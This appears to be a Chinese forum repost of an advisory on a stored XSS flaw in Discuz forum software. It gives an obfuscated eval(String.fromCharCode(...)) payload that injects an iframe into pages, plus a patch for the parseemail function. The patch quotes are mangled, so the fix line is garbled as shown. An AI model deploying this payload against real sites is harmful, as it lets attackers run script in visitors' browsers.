Discuz教程网

1314学习网»站长论坛 discuz资源中心 discuz动态 discuz 通杀版本存储型xss 0day
返回列表 发新帖

discuz 通杀版本存储型xss 0day

[复制链接]
authicon dly 发表于 2012-3-20 07:33:50 | 显示全部楼层 |阅读模式
2011年09月01日
鸡肋在于,要鼠标触碰才能触发。
  把上面的alert(/DZ-XSS-0DAY/)
  换成
  eval(String.fromCharCode(116,104,105,115,46,115,116,121,108,101,46,100,105,115,112,108,97,
  121,61,34,110,111,110,101,34,59,102,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,
  101,69,108,101,109,101,110,116,40,34,105,102,114,97,109,101,34,41,59,102,46,115,114,99,61,
  34,104,116,116,112,58,47,47,119,119,119,46,98,97,34,43,34,105,100,117,46,99,111,109,34,59,
  102,46,104,101,105,103,104,116,61,34,51,48,48,34,59,102,46,119,105,100,116,104,61,34,51,48,
  48,34,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,
  84,97,103,78,97,109,101,40,34,98,111,100,121,34,41,91,48,93,46,97,112,112,101,110,100,67,104,
  105,108,100,40,102,41,59))
   20117191381986.jpg
   20117191381275.jpg
   20117191383377.jpg
  修复方法:
  Discuz!X 系列程序
  修改文件 source/function/function_discuzcode.php
  Discuz 6-7.2程序
  修改文件 include/discuzcode.func.php
  修改方法:
  1. 查找代码: function parseemail($email, $text) {
  2. 在后面增加一行代码:
  $text = str_replace(‘”‘, ‘”‘, $text);

discuz



上一篇:专访Discuz 云平台经理赵永
下一篇:QQ互联发布插件版 将支持Discuz X1.5 2011-08-02

相关帖子
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

1314学习网 ( 浙ICP备10214163号 )

GMT+8, 2025-5-2 18:36

Powered by Discuz! X3.4

© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表